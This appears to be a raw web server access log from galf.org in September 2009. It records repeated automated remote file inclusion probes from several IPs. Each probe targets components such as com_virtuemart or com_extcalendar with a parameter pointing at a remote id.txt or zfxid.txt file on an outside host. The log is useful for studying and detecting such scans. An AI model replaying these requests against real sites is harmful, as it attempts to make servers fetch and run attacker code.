92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:41:59 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:00 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:00 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:01 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:01 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:01 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /logs/access_090309.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /logs/access_090223.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:02 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:03 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:05 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:05 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:07 -0700] "GET /logs/access_090309.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /logs/access_090223.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /logs/access_090223.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:09 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:10 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:13 -0700] "GET /logs/access_090309.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:15 -0700] "GET /logs/access_090223.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:15 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:16 -0700] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:18 -0700] "GET /logs/access_090223.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:18 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:21 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:22 -0700] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:22 -0700] "GET /logs/access_090323.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:26 -0700] "GET /logs/access_090323.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:27 -0700] "GET /logs/access_090309.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:27 -0700] "GET /logs/access_090525.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:27 -0700] "GET /logs/access_090302.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:30 -0700] "GET /logs/access_090525.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:30 -0700] "GET /logs/access_090302.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:31 -0700] "GET /logs/access_090323.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:32 -0700] "GET /logs/access_090504.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:32 -0700] "GET /logs/access_090427.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:32 -0700] "GET /logs/access_090713.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:35 -0700] "GET /logs/access_090504.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:35 -0700] "GET /logs/access_090427.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:35 -0700] "GET /logs/access_090713.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:36 -0700] "GET /logs/access_090615.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:36 -0700] "GET /logs/access_090727.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:36 -0700] "GET /logs/access_090622.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:38 -0700] "GET /logs/access_090323.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:39 -0700] "GET /logs/access_090615.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:39 -0700] "GET /logs/access_090727.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:42:39 -0700] "GET /logs/access_090622.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:42 -0700] "GET /logs/access_090323.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:42:43 -0700] "GET /logs/access_090525.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:43:10 -0700] "GET /logs/access_090720.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:14 -0700] "GET /logs/access_090302.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:14 -0700] "GET /logs/access_090504.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:14 -0700] "GET /logs/access_090427.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:23 -0700] "GET /logs/access_090302.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:23 -0700] "GET /logs/access_090504.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:28 -0700] "GET /logs/access_090427.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:31 -0700] "GET /logs/access_090713.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:31 -0700] "GET /logs/access_090615.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:31 -0700] "GET /logs/access_090727.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:35 -0700] "GET /logs/access_090713.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:38 -0700] "GET /logs/access_090727.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:43:53 -0700] "GET /logs/access_090323.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:09:43:54 -0700] "GET /logs/access_090427.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:44:09 -0700] "GET /logs/access_090323.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.227.142 - - [07/Sep/2009:09:44:27 -0700] "GET /logs/access_090525.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:44:32 -0700] "GET /logs/access_090525.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:44:37 -0700] "GET /logs/access_090525.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.75.220.49 - - [07/Sep/2009:09:45:04 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.75.220.49 - - [07/Sep/2009:09:45:04 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.75.220.49 - - [07/Sep/2009:09:45:04 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.75.220.49 - - [07/Sep/2009:09:47:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.75.220.49 - - [07/Sep/2009:09:47:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.75.220.49 - - [07/Sep/2009:09:47:28 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /logs/access_090406.log//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /logs//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /logs/access_090504.log//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /logs/access_090406.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:01 -0700] "GET /logs/access_090504.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:09 -0700] "GET /logs/access.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:17 -0700] "GET /logs/access_090518.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:17 -0700] "GET /logs/access_090601.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:27 -0700] "GET /logs/access_090316.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:27 -0700] "GET /logs/access_090209.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:32 -0700] "GET /logs/access_090713.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:32 -0700] "GET /logs/access_090427.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:32 -0700] "GET /logs/access_090330.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:37 -0700] "GET /logs/access_090413.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:38 -0700] "GET /logs/access_090223.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:38 -0700] "GET /logs/access_090629.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:48:40 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:48:40 -0700] "GET /logs/access_090629.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:48:40 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:43 -0700] "GET /logs/access_090615.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:43 -0700] "GET /logs/access_090727.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:49 -0700] "GET /logs/access_090216.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:48:59 -0700] "GET /logs/access_090323.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:04 -0700] "GET /logs/access_090629.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:04 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:14 -0700] "GET /logs/access_090420.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:19 -0700] "GET /logs/access_090420.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:24 -0700] "GET /logs/access_090511.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:33 -0700] "GET /logs/access_090316.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
